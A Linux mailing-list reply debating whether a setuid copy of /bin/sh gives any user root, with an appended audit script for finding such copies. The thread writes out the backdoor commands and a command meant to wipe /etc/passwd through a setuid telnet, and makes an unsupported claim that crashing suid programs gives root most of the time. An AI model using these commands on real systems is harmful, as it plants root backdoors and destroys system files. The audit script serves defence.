
Re: Hi all,



sudheer@xxxxxxxxxxxxx wrote:


> >
> > root>cp /bin/sh /bin/mysh
> > root>chmod +s /bin/mysh
> > root>chmod +x /bin/mysh 'may not be required.
> >
> > That's all, now go away and login as any user from any where in the
> > world,
> >
> > anyuser>whoami
> > anyuser
> > anyuser>/bin/mysh
> > anyuser>whoami
> > root
> 
>     This won't work. The shells are more intelligent nowadays.
>   They behave according to the uid of the process invoking the shell,
>   just like that of a 'passwd' program. Even though the setuid bit is
>   set for the 'passwd' program, a normal user can't change the passwd of
>   another user even if he knows the other person's passwd.
> 
>   Please correct me if I am wrong.
> 
> sudheer

Yes, it works on my rh 5.2 box, and that is the way I get root on my
linux box.

You cannot change the password of another user, because passwd checks for
the uid/gid.

Suid programs are extremely dangerous for the server security. If a user
can make any suid exit with a segmentation fault, he becomes root in
9 out of 10 cases.

Want to try the power of suid? But back up /etc/passwd, else you will
regret it.

root>chmod +s /bin/telnet

now be any user and

WARNING - make a copy of the /etc/passwd file before you proceed.

anyuser> telnet -n /etc/passwd nosuchhost.nosuchdomain

Your /etc/passwd file will be wiped out.

Best Wishes.

-mukund

http://members.theglobe.com/betacomp/default.html
http://members.xoom.com/BETACOMP/index1.htm


--------------------------------------------------------------------
For more information on Linux in India visit http://www.linux-india.org/
Linux India is NOT a forum for Microsoft/India/Pakistan/US/UK bashing.
Flame baits will not be tolerated.  If you can appreciate satire read
http://www.templetons.com/brad/emily.html

------------------------------
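
A defender-side check for the setuid shell copy described in the quoted message, as an added example that is not part of the original thread: it lists setuid/setgid files and flags any whose contents are identical to a shell. The function names and the use of /etc/shells as the reference list are assumptions of this example.

```shell
#!/bin/sh
# Added example (not from the thread): audit for setuid/setgid files and
# flag byte-for-byte copies of a shell, e.g. "cp /bin/sh /bin/mysh; chmod +s".

# Reference shells to compare against: /bin/sh plus the entries of /etc/shells.
reference_shells() {
    {
        echo /bin/sh
        if [ -r /etc/shells ]; then grep '^/' /etc/shells || true; fi
    } | sort -u
}

# find_suid_shell_copies DIR...
# Prints "path<TAB>matching-shell" for every setuid or setgid regular file
# under DIR whose contents equal one of the reference shells.
find_suid_shell_copies() {
    refs=$(reference_shells)
    find "$@" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null |
    while IFS= read -r candidate; do
        for ref in $refs; do
            [ -f "$ref" ] || continue
            if cmp -s "$candidate" "$ref"; then
                printf '%s\t%s\n' "$candidate" "$ref"
                break
            fi
        done
    done
}

# list_suid DIR...
# Long listing (numeric owner/group) of every setuid/setgid file, suitable
# for saving and diffing against a known-good baseline.
list_suid() {
    find "$@" -xdev -type f \( -perm -4000 -o -perm -2000 \) \
        -exec ls -ln {} + 2>/dev/null
}

# Run an audit only when directories are given on the command line.
if [ "$#" -gt 0 ]; then
    echo "setuid/setgid shell copies:"
    find_suid_shell_copies "$@"
    echo "all setuid/setgid files:"
    list_suid "$@"
fi
```

A renamed setuid telnet, as in the second demonstration, is not a shell copy; it shows up only in the `list_suid` output, so keep a baseline of that listing and review any new entry.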